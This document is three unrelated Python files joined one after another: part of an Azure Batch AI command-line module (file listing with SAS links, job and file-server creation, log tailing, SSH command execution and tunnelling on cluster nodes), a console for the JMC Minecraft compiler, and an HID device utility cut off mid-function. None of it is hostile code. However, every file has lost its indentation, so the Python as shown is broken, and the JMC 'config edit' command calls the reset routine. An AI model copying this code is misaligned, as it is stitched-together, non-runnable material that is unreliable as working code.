# The stdouterr directory must be on $AZ_BATCHAI_MOUNT_ROOT
raise CLIError(unsupported_location)
suffix = cluster.node_setup.setup_task.std_out_err_path_suffix
if not suffix:
# Clusters created with older API version do not report the path suffix, so we cannot find their files.
raise CLIError('List files is not supported for this cluster')
relative_mount_path = prefix[len('$AZ_BATCHAI_MOUNT_ROOT/'):]
if cluster.node_setup.mount_volumes is None:
# If nothing is mounted, the files were stored somewhere else and we cannot find them.
raise CLIError(unsupported_location)
# try mounted Azure file shares
for afs in cluster.node_setup.mount_volumes.azure_file_shares or []:
if _is_on_mount_point(relative_mount_path, afs.relative_mount_path):
return _get_files_from_afs(cli_ctx, afs, os.path.join(suffix, path), expiry)
# try mounted blob containers
for bfs in cluster.node_setup.mount_volumes.azure_blob_file_systems or []:
if _is_on_mount_point(relative_mount_path, bfs.relative_mount_path):
return _get_files_from_bfs(cli_ctx, bfs, os.path.join(suffix, path), expiry)
# the folder on some other file system or on local disk
raise CLIError(unsupported_location)
def _get_files_from_bfs(cli_ctx, bfs, path, expiry):
"""Returns a list of files and directories under given path on mounted blob container.
:param models.AzureBlobFileSystemReference bfs: blob file system reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
BlockBlobService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
Blob = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'blob#Blob')
BlobPermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
result = []
service = BlockBlobService(bfs.account_name, _get_storage_account_key(cli_ctx, bfs.account_name, None))
effective_path = _get_path_for_storage(path)
folders = set()
for b in service.list_blobs(bfs.container_name, effective_path + '/', delimiter='/'):
if isinstance(b, Blob):
name = os.path.basename(b.name)
sas = service.generate_blob_shared_access_signature(
bfs.container_name, b.name, BlobPermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
name, service.make_blob_url(bfs.container_name, b.name, 'https', sas),
False, b.properties.content_length))
else:
name = b.name.split('/')[-2]
folders.add(name)
result.append(LogFile(name, None, True, None))
result = [f for f in result if f.is_directory or f.name not in folders]
return result
def _get_path_for_storage(path):
"""Returns a path in format acceptable for passing to storage"""
result = os.path.normpath(path).replace('\\', '/')
if result.endswith('/.'):
result = result[:-2]
return result
def _get_files_from_afs(cli_ctx, afs, path, expiry):
"""Returns a list of files and directories under given path on mounted Azure File share.
:param models.AzureFileShareReference afs: Azure file share reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
FileService, File, FilePermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'file#FileService', 'file.models#File', 'file.models#FilePermissions')
result = []
service = FileService(afs.account_name, _get_storage_account_key(cli_ctx, afs.account_name, None))
share_name = afs.azure_file_url.split('/')[-1]
effective_path = _get_path_for_storage(path)
if not service.exists(share_name, effective_path):
return result
for f in service.list_directories_and_files(share_name, effective_path):
if isinstance(f, File):
sas = service.generate_file_shared_access_signature(
share_name, effective_path, f.name, permission=FilePermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
f.name, service.make_file_url(share_name, effective_path, f.name, 'https', sas),
False, f.properties.content_length))
else:
result.append(LogFile(f.name, None, True, None))
return result
def create_job(cmd, # pylint: disable=too-many-locals
client, resource_group, workspace_name, experiment_name, job_name, json_file,
cluster, nfs=None, nfs_mount_path='nfs', azure_file_share=None, afs_mount_path='afs',
container_name=None, container_mount_path='bfs', account_name=None, account_key=None):
_ensure_job_not_exist(client.jobs, resource_group, workspace_name, experiment_name, job_name)
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('JobCreateParameters', json_obj) # type: models.JobCreateParameters
# If cluster is not configured via command line, let's get it from the config file.
if not cluster:
cluster = params.cluster.id
if not cluster:
raise CLIError('Please provide cluster information via command line or configuration file.')
cluster_resource_group, cluster_workspace, cluster_name = _get_effective_resource_parameters(
cluster, resource_group, workspace_name)
# Check presence of the cluster.
existing_cluster = client.clusters.get(cluster_resource_group, cluster_workspace, cluster_name)
params.cluster = models.ResourceId(id=existing_cluster.id)
# Update credentials and other parameters for mount volumes configured via config file.
if params.mount_volumes:
params.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.mount_volumes, account_name, account_key)
# Create mount volumes if required
if nfs or azure_file_share or container_name:
params.mount_volumes = params.mount_volumes or models.MountVolumes()
mount_volumes = params.mount_volumes
# Add NFS into mount volumes
if nfs:
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
# Add Azure File Share into mount volumes.
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
# Add Blob Container into mount volumes.
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
params.mount_volumes = mount_volumes
return client.jobs.create(resource_group, workspace_name, experiment_name, job_name, params)
def list_files(client, resource_group, workspace_name, experiment_name, job_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
options = models.JobsListOutputFilesOptions(
outputdirectoryid=output_directory_id,
directory=path,
linkexpiryinminutes=expiry)
return list(client.list_output_files(resource_group, workspace_name, experiment_name, job_name, options))
def sigint_handler(*_):
# Some libs do not handle KeyboardInterrupt nicely and print junk
# messages. So, let's just exit without any cleanup.
# noinspection PyProtectedMember
os._exit(0) # pylint: disable=protected-access
def tail_file(client, resource_group, workspace_name, experiment_name, job_name, file_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.'):
signal.signal(signal.SIGINT, sigint_handler)
url = None
# Wait until the file become available.
reported_absence_of_file = False
while url is None:
files = list_files(client, resource_group, workspace_name, experiment_name, job_name, output_directory_id, path)
for f in files:
if f.name == file_name:
url = f.download_url
logger.warning('File found with URL "%s". Start streaming', url)
break
if url is None:
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
if not reported_absence_of_file:
logger.warning('The file "%s" not found. Waiting for the job to generate it.', file_name)
reported_absence_of_file = True
time.sleep(1)
if url is None:
logger.warning('The file "%s" not found for the completed job.', file_name)
return
# Stream the file
downloaded = 0
while True:
r = requests.get(url, headers={'Range': 'bytes={0}-'.format(downloaded)})
if int(r.status_code / 100) == 2:
downloaded += len(r.content)
print(r.content.decode(), end='')
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
time.sleep(1)
def wait_for_job_completion(client, resource_group, workspace_name, experiment_name, job_name, check_interval_sec=15):
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
logger.warning('Job submitted at %s', str(job.creation_time))
last_state = None
reported_job_start_time = False
while True:
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info and not reported_job_start_time:
logger.warning('Job started execution at %s', str(info.start_time))
reported_job_start_time = True
if job.execution_state != last_state:
logger.warning('Job state: %s', job.execution_state)
last_state = job.execution_state
if job.execution_state == models.ExecutionState.succeeded:
logger.warning('Job completed at %s; execution took %s', str(info.end_time),
str(info.end_time - info.start_time))
return
if job.execution_state == models.ExecutionState.failed:
_log_failed_job(resource_group, job)
sys.exit(-1)
time.sleep(check_interval_sec)
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)
def _log_failed_job(resource_group, job):
"""Logs information about failed job
:param str resource_group: resource group name
:param models.Job job: failed job.
"""
logger.warning('The job "%s" in resource group "%s" failed.', job.name, resource_group)
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info:
logger.warning('Job failed with exit code %d at %s; execution took %s', info.exit_code,
str(info.end_time), str(info.end_time - info.start_time))
errors = info.errors
if errors:
for e in errors:
details = '<none>'
if e.details:
details = '\n' + '\n'.join(['{0}: {1}'.format(d.name, d.value) for d in e.details])
logger.warning('Error message: %s\nDetails:\n %s', e.message, details)
sys.exit(info.exit_code)
logger.warning('Failed job has no execution info')
def create_file_server(client, resource_group, workspace, file_server_name, json_file=None, vm_size=None,
user_name=None, ssh_key=None, password=None, generate_ssh_keys=None, disk_count=None,
disk_size=None, caching_type=None, storage_sku=None, subnet=None, raw=False):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.file_servers, resource_group, workspace, file_server_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('FileServerCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.FileServerCreateParameters(location=None, vm_size=None, ssh_configuration=None, data_disks=None)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params.location = _get_workspace_location(client, resource_group, workspace)
if not params.data_disks:
# noinspection PyTypeChecker
params.data_disks = models.DataDisks(disk_size_in_gb=None, disk_count=None, storage_account_type=None)
if disk_size:
params.data_disks.disk_size_in_gb = disk_size
if not params.data_disks.disk_size_in_gb:
raise CLIError('Please provide disk size in Gb.')
if disk_count:
params.data_disks.disk_count = disk_count
if not params.data_disks.disk_count:
raise CLIError('Please provide number of data disks (at least one disk is required).')
if caching_type:
params.data_disks.caching_type = caching_type
if storage_sku:
params.data_disks.storage_account_type = storage_sku
if not params.data_disks.storage_account_type:
raise CLIError('Please provide storage account type (storage sku).')
if vm_size:
params.vm_size = vm_size
if not params.vm_size:
raise CLIError('Please provide VM size.')
if subnet:
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
params.subnet = models.ResourceId(id=subnet)
return client.file_servers.create(resource_group, workspace, file_server_name, params, raw=raw)
def list_file_servers(client, resource_group, workspace_name):
return client.list_by_workspace(resource_group, workspace_name)
def _get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def _create_tunnel(remote_host, port, username, password, ssh_private_key, local_addresses, remote_addresses, func):
"""Creates a tunnel to the remote host and runs provided func under the tunnel.
:param str remote_host: ip or address of the remote host
:param int port: the ssh port number
:param str username: username to login under
:param str or None password: the user password
:param str or None ssh_private_key: the path to private ssh key
:param local_addresses: local addresses to be forwarded
:param remote_addresses: target addresses
:param func: a function to run on the remote host. The forwarding is stopped as soon as func completes execution.
"""
from sshtunnel import SSHTunnelForwarder
local_addresses = [(a[0], a[1] if a[1] != 0 else _get_available_local_port()) for a in local_addresses]
with SSHTunnelForwarder((remote_host, port),
ssh_username=username,
ssh_password=password,
ssh_pkey=ssh_private_key,
remote_bind_addresses=remote_addresses,
local_bind_addresses=local_addresses):
func()
def _ssh_exec(ip, port, cmdline, username, password, ssh_private_key):
"""Executes the given cmdline on the provided host under given credentials.
:param str ip: id address
:param int port: the ssh port number
:param str cmdline: command line to execute
:param str username: username to login
:param str or None password: the user password
:param str or None ssh_private_key: the path to the private ssh key
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port, username, password=password, key_filename=ssh_private_key)
transport = ssh.get_transport()
transport.set_keepalive(15)
_, out, err = ssh.exec_command('bash -ilc "{}"'.format(cmdline), get_pty=True)
output_lock = threading.Lock()
def _worker(s):
for item in s:
with output_lock:
print(item, end='')
threads = [threading.Thread(target=_worker, args=(s,)) for s in [out, err]]
for t in threads:
t.start()
# On Windows thread.join() call prevents the master thread from handling Ctrl-C, so we are joining with timeout.
while True:
for t in threads:
t.join(timeout=1)
if not t.is_alive():
return
def exec_on_node(client, resource_group, workspace_name, cluster_name, node_id=None, ports=None, cmdline=None,
password=None, ssh_private_key=None):
from sshtunnel import BaseSSHTunnelForwarderError
if not any((cmdline, ports)):
return
ip, port = None, None
if node_id:
for n in client.list_remote_login_information(resource_group, workspace_name, cluster_name):
if n.node_id == node_id:
ip = n.ip_address
port = int(n.port)
if ip is None:
raise CLIError('Cannot find a node with id={0}'.format(node_id))
else:
nodes = list(client.list_remote_login_information(resource_group, workspace_name, cluster_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
ip = nodes[0].ip_address
port = int(nodes[0].port)
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
username = cluster.user_account_settings.admin_user_name
try:
signal.signal(signal.SIGINT, sigint_handler)
if ports:
local_addresses = [('0.0.0.0', int(p.split(':')[0])) for p in ports]
remote_addresses = [(p.split(':')[1], int(p.split(':')[2])) for p in ports]
if cmdline:
func = partial(_ssh_exec, ip, port, cmdline, username, password, ssh_private_key)
else:
def _sleep():
while True:
time.sleep(1)
func = _sleep
_create_tunnel(ip, port, username, password, ssh_private_key,
local_addresses, remote_addresses, func)
else:
_ssh_exec(ip, port, cmdline, username, password, ssh_private_key)
except (BaseSSHTunnelForwarderError, paramiko.ssh_exception.AuthenticationException) as e:
raise CLIError('Connection to remote host failed. Please check provided credentials. Error: {0}'.format(e))
def exec_on_job_node(client, resource_group, workspace_name, experiment_name, job_name, node_id=None, ports=None,
cmdline=None, password=None, ssh_private_key=None):
if not any((cmdline, ports)):
return
# find the node if was not provided
if not node_id:
nodes = list(client.jobs.list_remote_login_information(
resource_group, workspace_name, experiment_name, job_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
node_id = nodes[0].node_id
# find the cluster
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
cluster_id = parse_resource_id(job.cluster.id)
exec_on_node(client.clusters, cluster_id['resource_group'], cluster_id['name'],
cluster_id['resource_name'], node_id, ports, cmdline, password, ssh_private_key)
|
main.py | import os
import atexit
import threading
from pathlib import Path
from enum import Enum
from json import dump, load
from datetime import datetime
from time import perf_counter
from getpass import getpass
from traceback import format_exc
import jmc
from jmc.exception import (
JMCDecodeJSONError,
JMCFileNotFoundError,
JMCSyntaxException,
JMCSyntaxWarning,
MinecraftSyntaxWarning,
JMCBuildError
)
VERSION = 'v1.2.0-alpha'
CWD = Path(os.getcwd())
LOG_PATH = CWD/'log'
CONFIG_FILE_NAME = 'jmc_config.json'
NEW_LINE = '\n'
config = dict()
logger = jmc.Logger(__name__)
class Colors(Enum):
HEADER = '\033[1;33;40m'
YELLOW = '\033[33;40m'
INFO = '\033[94;40m'
INPUT = '\033[96;40m'
PURPLE = '\033[35;40m'
FAIL = '\033[91;40m'
FAIL_BOLD = '\033[1;91;40m'
ENDC = '\033[0;0;40m'
EXIT = '\033[0;0;0m'
NONE = '\033[0;37;40m'
def pprint(values, color: Colors = Colors.NONE):
print(f"{color.value}{values}{Colors.ENDC.value}")
def get_input(prompt: str = "> ", color: Colors = Colors.INPUT) -> str:
input_value = input(f"{color.value}{prompt}")
print(Colors.ENDC.value, end="")
logger.info(f"Input from user: {input_value}")
return input_value
def press_enter(prompt: str, color: Colors = Colors.INPUT) -> None:
getpass(f"{color.value}{prompt}{Colors.ENDC.value}")
def error_report(error: Exception) -> None:
pprint(type(error).__name__, Colors.FAIL_BOLD)
pprint(error, Colors.FAIL)
def main() -> None:
global config
os.system("")
logger.info(f"Build-version: {VERSION}")
pprint(' JMC Compiler\n', Colors.HEADER)
pprint(f'Current Directory | {CWD}\n', Colors.YELLOW)
if not (CWD/CONFIG_FILE_NAME).is_file():
pprint(
f'No confile file found, generating {CONFIG_FILE_NAME}...', Colors.INFO
)
while True:
config["namespace"] = get_input(f"Namespace: ")
if " " in config["namespace"] or "\t" in config["namespace"]:
pprint("Invalid Namespace: Space detected.", Colors.FAIL)
continue
if config["namespace"] == "":
pprint(
"Invalid Namespace: Namespace need to have 1 or more character.", Colors.FAIL
)
continue
if not config["namespace"].islower():
pprint("Invalid Namespace: Uppercase character detected.", Colors.FAIL)
continue
break
config["description"] = get_input(f"Description: ")
while True:
config["pack_format"] = get_input(f"Pack Format: ")
if not config["pack_format"].isdigit():
pprint("Invalid Pack Format: Non integer detected.", Colors.FAIL)
continue
break
while True:
config["target"] = get_input(
f"Main JMC file(Leave blank for default[main.jmc]): "
)
if config["target"] == "":
config["target"] = (
CWD/'main.jmc'
).resolve().as_posix()
break
if not config["target"].endswith(".jmc"):
pprint("Invalid path: Target file needs to end with .jmc", Colors.FAIL)
continue
try:
config["target"] = Path(config["target"]).resolve().as_posix()
except BaseException:
pprint("Invalid path", Colors.FAIL)
continue
break
while True:
config["output"] = get_input(
f"Output directory(Leave blank for default[current directory]): "
)
if config["output"] == "":
config["output"] = CWD.resolve().as_posix()
break
try:
output = Path(config["output"]).resolve()
if output.is_file():
pprint("Path is not a directory.", Colors.FAIL)
config["output"] = output.as_posix()
except BaseException:
pprint("Invalid path", Colors.FAIL)
continue
break
with (CWD/CONFIG_FILE_NAME).open('w') as file:
dump(config, file, indent=2)
else:
with (CWD/CONFIG_FILE_NAME).open('r') as file:
config = load(file)
pprint("To compile, type `compile`. For help, type `help`", Colors.INFO)
while True:
command = get_input().split()
{
"cd": CMD.cd,
"help": CMD.help,
"exit": CMD.exit,
"compile": CMD.compile,
"log": CMD.log,
"autocompile": CMD.autocompile,
"config": CMD.config,
}.get(command[0], CMD.default)(*command[1:])
class CMD:
event = threading.Event()
@classmethod
def default(cls, *arg):
pprint("Command not recognized, try `help` for more info.", Colors.FAIL)
@classmethod
def help(cls):
pprint("""Avaliable commands:
cd <path>: Change current directory
compile: Compile your JMC file(s)
autocompile <interval (second)>: Start automatically compiling with certain interval
log (debug|info): Create log file in output directory
log clear: Delete every log file inside log folder except latest
config reset: Delete the configuration file and restart the compiler
config edit: Override configuration file and bypass error checking
help: Output this message
exit: Exit compiler
""", color=Colors.YELLOW)
@classmethod
def cd(cls, *args):
if not args:
pprint("Usage: cd <path>", Colors.FAIL)
return
path = ' '.join(args)
try:
os.chdir(path)
global CWD
global LOG_PATH
CWD = Path(os.getcwd())
LOG_PATH = CWD/'log'
main()
except ValueError:
pprint("Invalid path", Colors.FAIL)
@classmethod
def exit(cls, *args):
exit(0)
@classmethod
def compile(cls, *args):
debug_compile = False
if args:
if len(args) == 1 and args[0] == 'debug':
debug_compile = True
pprint("DEBUG MODE", Colors.INFO)
else:
pprint("Usage: compile", Colors.FAIL)
return
pprint("Compiling...", Colors.INFO)
try:
start_time = perf_counter()
jmc.compile(config, debug=True)
stop_time = perf_counter()
pprint(
f"Compiled successfully in {stop_time-start_time} seconds", Colors.INFO)
except (
JMCSyntaxException,
JMCFileNotFoundError,
JMCDecodeJSONError,
JMCSyntaxWarning,
MinecraftSyntaxWarning,
JMCBuildError
) as error:
logger.debug(format_exc())
error_report(error)
except Exception as error:
logger.exception("Non-JMC Error occur")
error_report(error)
if debug_compile:
cls._log_debug()
cls._log_clear()
@classmethod
def autocompile(cls, *args):
if len(args) > 1 or len(args) == 0:
pprint("Usage: autocompile <interval (second)>", Colors.FAIL)
return
try:
interval = int(args[0])
except ValueError:
pprint("Invalid integer", Colors.FAIL)
return
except BaseException as error:
pprint(type(error).__name__, Colors.FAIL_BOLD)
pprint(error, Colors.FAIL)
if interval == 0:
pprint("Interaval cannot be 0 seconds", Colors.FAIL)
return
thread = threading.Thread(
target=lambda: cls._background(interval),
daemon=True
)
cls.event.clear()
thread.start()
press_enter("Press Enter to stop...\n")
pprint("Stopping...", Colors.INFO)
cls.event.set()
thread.join()
@classmethod
def _background(cls, interval: int):
while not cls.event.is_set():
logger.debug("Auto compiling")
cls.compile()
cls.event.wait(interval)
@classmethod
def config(cls, *args):
if not args:
pprint("Usage: config (reset|edit)", Colors.FAIL)
return
if args[0] == 'reset':
cls._config_reset()
elif args[0] == 'edit':
cls._config_reset()
else:
pprint("Usage: config (reset|edit)", Colors.FAIL)
return
@classmethod
def _config_reset(cls):
(CWD/CONFIG_FILE_NAME).unlink(missing_ok=True)
pprint("Resetting configurations", Colors.PURPLE)
print('\n'*5)
main()
@classmethod
def _config_edit(cls):
global config
pprint(f"""Edit configurations (Bypass error checking)
Type `cancel` to cancel
{NEW_LINE.join([f"- {key}" for key in config])}""", Colors.PURPLE)
key = get_input("Configuration: ")
if key not in config:
if key.lower() == 'cancel':
return
pprint("Invalid Key", Colors.FAIL)
cls._config_edit()
else:
pprint(f"Current {key}: {config[key]}", Colors.YELLOW)
config[key] = get_input("New Value: ")
with (CWD/CONFIG_FILE_NAME).open('w') as file:
dump(config, file, indent=2)
@classmethod
def log(cls, *args):
if len(args) > 1 or not args:
pprint("Usage: log (debug|info|clear)", Colors.FAIL)
return
if args[0] == 'debug':
cls._log_debug()
elif args[0] == 'info':
cls._log_info()
elif args[0] == 'clear':
cls._log_clear()
else:
pprint("Usage: log (debug|info|clear)", Colors.FAIL)
return
@classmethod
def _log_clear(cls):
logger.info("Clearing logs")
if not LOG_PATH.is_dir():
logger.debug("Log folder not found")
return
for path in LOG_PATH.iterdir():
if not path.is_file():
continue
if path.suffix != '.log':
continue
if path.name == 'latest.log':
continue
path.unlink()
@classmethod
def _log_debug(cls):
logger.info("Requesting debug log")
LOG_PATH.mkdir(exist_ok=True)
debug_log = jmc.get_debug_log()
with (LOG_PATH/datetime.now().strftime("JMC_DEBUG - %y-%m-%d %H.%M.%S.log")).open('w+') as file:
file.write(debug_log)
with (LOG_PATH/"latest.log").open('w+') as file:
file.write(debug_log)
@classmethod
def _log_info(cls):
logger.info("Requesting info log")
LOG_PATH.mkdir(exist_ok=True)
info_log = jmc.get_info_log()
with (LOG_PATH/datetime.now().strftime("JMC_INFO - %y-%m-%d %H.%M.%S.log")).open('w+') as file:
file.write(info_log)
with (LOG_PATH/"latest.log").open('w+') as file:
file.write(info_log)
if __name__ == '__main__':
atexit.register(lambda: print(Colors.EXIT.value, end=""))
logger.info("Starting session")
# main()
while True:
try:
main()
except Exception as error:
CMD.event.set()
pprint("Unexpected error causes program to crash", Colors.FAIL)
pprint(type(error).__name__, Colors.FAIL_BOLD)
pprint(error, Colors.FAIL)
logger.critical("Program crashed")
logger.exception("")
press_enter("Press Enter to continue...")
|
lines_from_log.py | #!/usr/bin/python3
# file: C:\Work\Python\HID_Util\src\lines_from_log.py
# usage: user must have the file Log_in_YAT_format.txt to retrieve line by line and send
# commands with appropriate delay to the HID device
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
from time import sleep
# NOTE: about include_dll_path for __init__.py error.
# You MUST include the next line when working with full project path structure
import include_dll_path
import hid
import os
import re
# VENDOR_ID = 0x24b3 # Simb
# PRODUCT_ID = 0x1005 # Simb MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simb
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
FILE1_PATH = "log\hid_log.csv"
# if not os.path.exists('log'):
# os.makedirs('log')
# # file1 = None
# # open recording log file:
# filename = "\log_in_yat_format.txt"
# path = os.getcwd()+filename
YAT_format = open("C:\Work\Python\Parsing_Scripts\Log_in_YAT_format.txt")
# # file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
# # file1 = open(FILE1_PATH,"w")
# file1 = open("log\get_FW_version_2021_03_11__00_42.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_GET_FW_VERSION = bytes.fromhex("3f040600000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_PRIME_KEEP_ALIVE = bytes.fromhex("3f040400000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_PRIME_KEEP_ALIVE = bytes.fromhex("3f040400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
# print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
def len_st(size):
if size <= 10:
len_h = str(size)
len_h = "0"+len_h
return len_h
else:
# tbd
pass
return "77" # need to fix this one!!!
# global variables
special_cmd = 0
root = None
def main_loop(device):
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
global special_cmd
global WRITE_DATA
d = 1000
i = 0
j = 1
while True:
# for line in YAT_format:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
elif special_cmd == 'A':
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
if PRODUCT_ID in PRODUCT_ID_types:
WRITE_DATA = WRITE_DATA_CMD_PRIME_KEEP_ALIVE
# WRITE_DATA = WRITE_DATA_CMD_GET_FW_VERSION
# print("special_cmd A -> WRITE_DATA_CMD_GET_FW_VERSION")
